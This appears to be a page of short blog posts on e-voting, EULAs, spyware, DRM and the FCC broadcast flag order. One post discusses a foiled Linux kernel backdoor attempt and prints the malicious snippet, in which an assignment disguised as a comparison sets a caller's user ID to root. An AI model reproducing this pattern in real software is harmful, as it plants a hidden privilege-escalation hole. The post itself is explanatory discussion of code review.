April 21, 2014

avatar

Diebold to Stop Suppressing Memos

Diebold has filed a court document promising not to sue people for posting the now-famous memos, and withdrawing the DMCA takedown notices it had sent previously. It’s a standard-issue lawyer’s non-surrender surrender (“Mr. Bonaparte, having demonstrated his mastery of the Waterloo battlefield, chooses to withdraw at this time”), asserting that “[u]nder well-established copyright law” Diebold could win an infringement suit, but that Diebold has decided anyway not to sue, given that it no longer has any realistic hope of suppressing distribution of the memos.

Diebold’s filing also contains this interesting sentence:

Diebold has informally encouraged the students to refrain from publishing passwords, source codes, information protected by employees’ privacy interests, and trade secret-type information, none of which is essential for purposes of criticism.

Some of these things certainly are essential for criticism. Diebold’s source code, for instance, is the most precise description of how their technology works, so it has obvious relevance to criticism of the technology’s security or reliability. Trade secret information includes facts about the failure history of the product, which are also highly relevant.

I’m not saying that it is always legal or ethical to publish companies’ source code or trade secrets, no matter what the circumstances. But in this case, some code and some trade secrets are essential for criticism, and Diebold’s assertion to the contrary doesn’t pass the laugh test.

[Link via Larry Lessig.]

avatar

Taming EULAs

Most software programs, and some websites, are subject to End User License Agreements (EULAs). EULAs are long and detailed and apparently written by lawyer-bots. Almost everybody agrees to them without even reading them. A EULA is a contract, but it’s not the result of a negotiation between the vendor and the user. The vendor writes the EULA, and the user can take it or leave it. Most users just accept EULAs without thinking.

This has led to any number of problems. For example, some EULAs give the software vendors permission to install spyware – and most users never realize they have granted that permission.

Why don’t users pay more attention to EULAs? Rational ignorance is one possibility – it may be that the cost of accepting a bad EULA every now and then is lower than the cost of actually reading EULAs and making careful decisions. If so, then a rational cost-minimizing user won’t read EULAs.

And there are a few oddballs who read EULAs. When these people find a particularly egregious provision, they spread the word. Occasionally the press will report on an extreme EULA. So rationally ignorant consumers get a little information about popular EULAs, and there is some pressure on vendors to keep their EULAs reasonable.

In domains where rational ignorance is common, tools often spring up to help people make decisions that are more rational and less ignorant. If it’s not worth your time to research your senator’s voting record, you can look at how he is rated by the Environmental Defense Fund or the NRA, or you can see who has endorsed him for reelection. None of these sources captures the nuances of an individual voting record. But if you’re not going to spend the time to examine that record, these crude tools can be valuable.

When it comes to EULAs, we don’t have these tools. So let’s create them. Let me suggest two useful tools.

The first tool is a service, provided via a website, that rates EULAs in the same way that political advocacy groups rate legislators. I’m not talking about a detailed explanation – which rationally ignorant users wouldn’t bother to read – but a simple one-dimensional rating, such as a grade on an A-to-F scale. Products whose EULAs get good scores might be allowed to display a trademarked “Our EULA got an A-” logo.

Naturally, reducing a complex EULA to a single rating is an oversimplification. But that’s exactly the point. Rationally ignorant users demand simplification, and if they don’t get it they’ll decide based on no information at all. The site could offer more details for users who want them. But let’s face it: most users don’t.

The second tool is a standardized template for writing EULAs, akin to the structure of Creative Commons licenses. You’d have some core EULA language, along with a set of modules that could be added at the vendor’s discretion. Standardized EULAs can be displayed concisely to the user, by listing the modules that are included. They could be expressed easily in machine-readable form, so various automated tools could be created.

The main benefit of standardization is that users could re-use what they had learned about past licenses, so that the cost of learning about a license could be amortized over more decisions. Standardization would also seem to benefit those companies who have more likable EULAs, since it would help users notice the substantive differences between the EULAs they see.

Will either of these things happen? I don’t know. But I would like to see somebody try them.

avatar

California to Require Open-Source in Voting Software?

Donna Wentworth at Copyfight points to the fine print in the recent e-voting edict from California Secretary of State Kevin Shelley, which says this:

Any electronic verification method must have open source code in order to be certified for use in a voting system in California.

Many computer scientists have argued that e-voting systems should be required to have open source code, because of the special circumstances surrounding voting. Is that what Mr. Shelley is requiring?

I’m not sure. His requirement applies to “electronic verification method[s]” and not explicitly to all e-voting systems. What exactly is an “electronic verification method”? Mr. Shelley’s directive uses this term in reference to the report of a previous task force on e-voting.

So what does the task force’s report say? Surprisingly, the report refers to “electronic verification” methods at several points, but I couldn’t find any specific mention of what those methods might be. This is particularly odd considering that the task force members included computer scientists (including David Dill and David Jefferson) who are more than qualified to understand and write about any “electronic verification” methods, even if only to summarize them or give examples.

It looks as if there might be a hidden layer to this story, but I can’t figure out what it could be. Can anybody help out?

[Correction (1:50 PM): corrected the spelling of Kevin Shelley's last name.]

avatar

California to Require E-Voting Paper Trail

California Secretary of State Kevin Shelley will announce today that as of 2006, all e-voting machines in the state must provide a voter-verifiable paper trail, according to an L.A. Times story by Allison Hoffman and Tim Reiterman.

This is yet another sign that the push for sensible e-voting safeguards is gaining momentum.

[Link credit: Siva Vaidhyanathan at Sivacracy.net.]

avatar

Princeton Ignores Strauss, Makes Sensible Decisions

The Office of Information Technology (OIT) here at Princeton has taken the unusual step of issuing a statement distancing itself from the views expressed by one of its employees, Howard Strauss, in a column in Syllabus magazine.

(OIT operates the campus network and other shared computing facilities. It is not to be confused with the Computer Science Department, which is the main site of information technology teaching and research at Princeton.)

Mr. Strauss’s column, which really has to be read to be believed, likens open source products to fraudulent Nigerian spam emails.

Fortunately the grownups in charge at OIT responded by reiterating the university’s non-Straussian procurement policy, which is based not on a rigid pro- or anti-open source rule but instead involves – listen carefully, ’cause this might be hard to follow – looking at all of the available products and choosing the best one for the job.

avatar

CDT Report on Spyware

The Center for Democracy and Technology has issued a sensible and accessible paper about the spyware problem and associated policy issues.

Spyware is software, installed on your computer without your consent, that gathers information about what you do on your computer. It’s shockingly common – if you are a typical active web surfer using Internet Explorer in its default configuration, and you haven’t been taking specific steps to protect yourself against spyware, then you probably have several spyware programs on your computer right now.

CDT recommends that end users protect themselves by using anti-spyware tools such as AdAware, Spybot Search and Destroy, Spyware Eliminator, or BPS Spyware/Adware Remover. (I have had good luck with Spybot Search and Destroy.)

At the policy level, CDT is lukewarm about attempts to ban spyware specifically, because of the difficult line-drawing exercise involved in distinguishing spyware from certain types of legitimate programs. They argue instead for policies that address the underlying problems: installation without consent, and surreptitious monitoring of user behavior.

Kudos to CDT for advancing the policy discussion on this often overlooked issue.

avatar

Flaky Voting Technology

Opponents of unauditable e-voting technology often talk about the threat of fraud. They worry that somebody will compromise a voting machine or will corrupt the machines’ software, to steal an election. We should worry about fraud. But just as important, and more likely, is the possibility that software bugs will cause a miscount that gives an election to the wrong candidate.

This may be what happened two weeks ago in a school board race in Fairfax County, Virginia. David Cho at the Washington Post reports :

School Board member Rita S. Thompson (R), who lost a close race to retain her at-large seat, said yesterday that the new computers might have taken votes from her. Voters in three precincts reported that when they attempted to vote for her, the machines initially displayed an “x” next to her name but then, after a few seconds, the “x” disappeared.

In response to Thompson’s complaints, county officials tested one of the machines in question yesterday and discovered that it seemed to subtract a vote for Thompson in about “one out of a hundred tries,” said Margaret K. Luca, secretary of the county Board of Elections.

“It’s hard not to think that I have been robbed,” said Thompson, whose 77,796 recorded votes left her 1,662 shy of reelection. She is considering her next step, and said she was wary of challenging the election results: “I’m not sure the county as a whole is up for that. I’m not sure I’m up for that.”

And how do we know the cause was a bug, rather than fraud? Because the error was visible to voters. If this had been fraud, the “X” on the screen would never have disappeared – but the vote would have been given, silently, to the wrong candidate.

You could hardly construct a better textbook illustration of the importance of having a voter-verifiable paper trail. The paper trail would have helped voters notice the disappearance of their votes, and it would have provided a reliable record to consult in a later recount. As it is, we’ll never know who really won the election.

avatar

Linux Backdoor Attempt Thwarted

Kerneltrap.org reports that somebody tried last week to sneak a snippet of malicious code into the Linux kernel’s source code, to create a backdoor that could be exploited later to seize control of Linux machines. Fortunately, members of the software development team spotted the problem the next day and removed the offending code.

The malicious code snippet was small but it was constructed cleverly, so that most programmers would miss the problem on casual reading of the code.

This incident illuminates an interesting debate on the security tradeoffs between open-source and proprietary code. Opponents of open-source argue that the open development process makes it easier for a badguy to inject malicious code. Fans of open-source argue that open code makes it easier for the good guys to spot problems. Both groups can find some support in this story, in which an unknown person did inject malicious code, and open-source devleopers did read the code and spot the problem.

What we don’t know is how often this sort of thing happens in proprietary software development. There must be some attempts to insert malicious code, given the amount of money at stake and the sheer number of people who have the opportunity to try inserting a backdoor. But we don’t know how many people try, or how quickly they are caught.

[Technogeek readers: The offending code is below. Can you spot the problem?

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
]

avatar

New Sony CD-DRM Technology Upcoming

Reuters reports that a new CD copy-protection technology from Sony debuted yesterday in Germany, on a recording by the group Naturally Seven. Does anybody know how I can get a copy of this CD?

UPDATE (12:30 PM): Thanks to Joe Barillari and Scott Ananian for pointing me to amazon.de, where I ordered the CD. (At least I think I did; my German is pretty poor.)

avatar

Broadcast Flag Scorecard

Before the FCC issued its Broadcast Flag Order, I wrote a post on “Reading the Broadcast Flag Rules”, in which I recommended reading the eventual Order carefully since “the details can make a big difference.” I pointed to four specific choices the FCC had to make.

Let’s look at how the FCC chose. For each of the four issues I identified, I’ll quote in italics my previous posting, and then I’ll summarize the FCC’s action.

First, look at the criteria that an anti-copying technology must meet to be on the list of approved technologies. Must a technology give copyright owners control over all uses of content; or is a technology allowed [to] support legal uses such as time-shifting; or is it required to support such uses?

The Order says that technologies must prevent “indiscriminate redistribution”, but it isn’t precise about what that term means. The precise scope of permissible redistribution is deferred to a later rulemaking. There is also some language expressing a desire not to control copying within the home, but that desire may not be backed by formal requirement.

Verdict: This issue is still unresolved; perhaps the later rulemaking will clarify it.

Second, look at who decides which technologies can be on the approved list. Whoever makes this decision will control entry into the market for digital TV decoders. Is this up to the movie and TV industries; or does an administrative body like the FCC decide; or is each vendor responsible for determining whether their own technology meets the requirements?

This issue was deferred to a later rulemaking process, so we don’t know what the final answer will be. The FCC does appear to understand the danger inherent in letting the entertainment industry control the list.

The Order does establish an interim approval mechanism, in which the FCC makes the final decisions, after a streamlined filing and counter-filing process by the affected parties.

Verdict: This issue was deferred until later, but the FCC seems to be leaning in the right direction.

Third, see whether the regulatory process allows for the possibility that no suitable anti-copying technology exists. Will the mandate be delayed if no strong anti-copying technology exists; or do the rules require that some technology be certified by a certain date, even if none is up to par?

The Order doesn’t address this issue head-on. It does say that to qualify, a technology need only resist attacks by ordinary users using widely available tools. This decision, along with the lack of precision about the scope of home copying that will be allowed, makes it easier to find a compliant technology later.

Verdict: This issue was not specifically addressed; it may be clarified in the later rulemaking.

Finally, look at which types of devices are subject to design mandates. To be covered, must a device be primarily designed for decoding digital TV; or is it enough for it to be merely capable of doing so? Do the mandates apply broadly to “downstream devices”? And is something a “downstream device” based on what it is primarily designed to do, or on what it is merely capable of doing?

This last issue is the most important, since it defines how broadly the rule will interfere with technological progress. The worst-case scenario is an overbroad rule that ends up micro-managing the design of general-purpose technologies like personal computers and the Internet. I know the FCC means well, but I wish I could say I was 100% sure that they won’t make that mistake.

The Order regulates Digital TV demodulators, as well as Transport Stream Processors (which take the demodulated signal and separate it into its digital audio, video, and metadata components).

The impact on general-purpose computers is a bit hard to determine. It appears that if a computer contains a DTV receiver card, the communications between that card and the rest of the computer would be regulated. This would then impact the design of any applications or device drivers that handle the DTV stream coming from the card.

Verdict: The FCC seems to have been trying to limit the negative impact of the Order by limiting its scope, but some broad impacts seem to be inevitable side-effects of mandating any kind of Flag.

Bottom line: The FCC’s order will be harmful; but it could have been much, much worse.